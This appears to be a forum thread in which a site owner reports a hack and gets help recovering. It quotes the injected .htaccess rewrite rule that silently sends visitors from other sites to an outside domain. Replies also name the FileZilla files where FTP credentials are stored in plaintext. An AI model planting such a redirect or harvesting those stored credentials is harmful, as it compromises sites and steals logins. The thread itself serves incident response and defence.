My site hacked: suspicious additions to .htaccess file

[andy.storey]

hi all

My website
http://cycling-jersey-collection.com/

stopped working overnight, and after looking at at the files on the server there was .htaccess files in every directory.

Here's some of the code that was in the .htaccess files
<IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+) RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/
$ [NC] RewriteRule ^.*$ http://medlab-pdm.de/mchd.html?h=1393979 [L,R] </IfModule>

I have now removed them all, and have re-uploaded my "proper" .htaccess file too.

Has anybody else encountered this and do anyof you have any suggestions to stop it happening again.

Many thanks

Andy

[Timbow]

Your site is not fixed
Redirected to this.
Redirecting to google now

[shawn_a]

Get copies of your accesslogs ASAP.

[andy.storey]

somehow they accessed the site via ftp despite me having a long, non-english word password with caps and numbers!

i've now blocked both IP address at the firewall.

[Connie]

andy,

did you contact your hoster? They should protect the systems better...

[yojoe]

Has anybody else encountered this and do anyof you have any suggestions to stop it happening again.

If you store unencrypted passwords in FTP app you use, infection might happen again. The same goes to all other users also having ftp accounts, and store them unencrypted. Their computers might be infected with a virus.

I suggest changing ftp passwords asap, and encrypt them or not store them at all. The same goes to main hosting account pass, if it's also used to connect to FTP.

Of course infection could happen through a security hole in another webapp or its plugin.

[andy.storey]

thanks yojoe

i've changed the cPanel and ftp passwords to 2 different passwords.

I've also changed FTP programmes (was using filezilla) and will no longer "Save Passwords" in the new FTP prog.

a.

[yojoe]

saved ftp pass in filezilla ? :\
This app is a nightmare. At least you know the way of infection.

ps. Rescan your PC with AV software, might be even online
You may find links to usefeul scanners on this page: http://www.itsecurity.com/features/free-...ls-101207/

[shovenose]

andy,

did you contact your hoster? They should protect the systems better...

Oh yeah because a user using insecure software on this computer and getting compromised is really the fault of the hosting company?

[shovenose]

saved ftp pass in filezilla ? :\
This app is a nightmare. At least you know the way of infection.

ps. Rescan your PC with AV software, might be even online
You may find links to usefeul scanners on this page: http://www.itsecurity.com/features/free-...ls-101207/

This.
I highly recommend you scan the computer with Malwarebytes Anti-Malware Free Edition. It's a great scanner (not pro active Anti-virus protection)...

[shawn_a]

What's wrong with FileZilla? Surely it safely stores passwords. No?

[shovenose]

What's wrong with FileZilla? Surely it safely stores passwords. No?

Stored in plaintext!
Go to C:\Users\Michel\AppData\Roaming\FileZilla in Windows, open recentservers.xml and sitemanager.xml all of your usernames, passwords, hostnames, ips, etc. are in there, unencrypted!

[shawn_a]

ooh

[yojoe]

shawn: filezilla never had a way to encrypt stored passwords, thus I always advised against using it.
I suggest using unreal commander (with a free licence) as it allows to encrypt with main pass or with systemID and main pass. There's also "freecommander" but I haven't tested its FTP capabilities.

btw. infections through FTP happens pretty often.
At least browsers and search engines warn visitors when they enter an infected website.

[rezfill]

So far I can only suspect that FTP passwords were somehow intercepted and suggest that you use SFTP instead of FTP if your hosting plan provides SFTP access.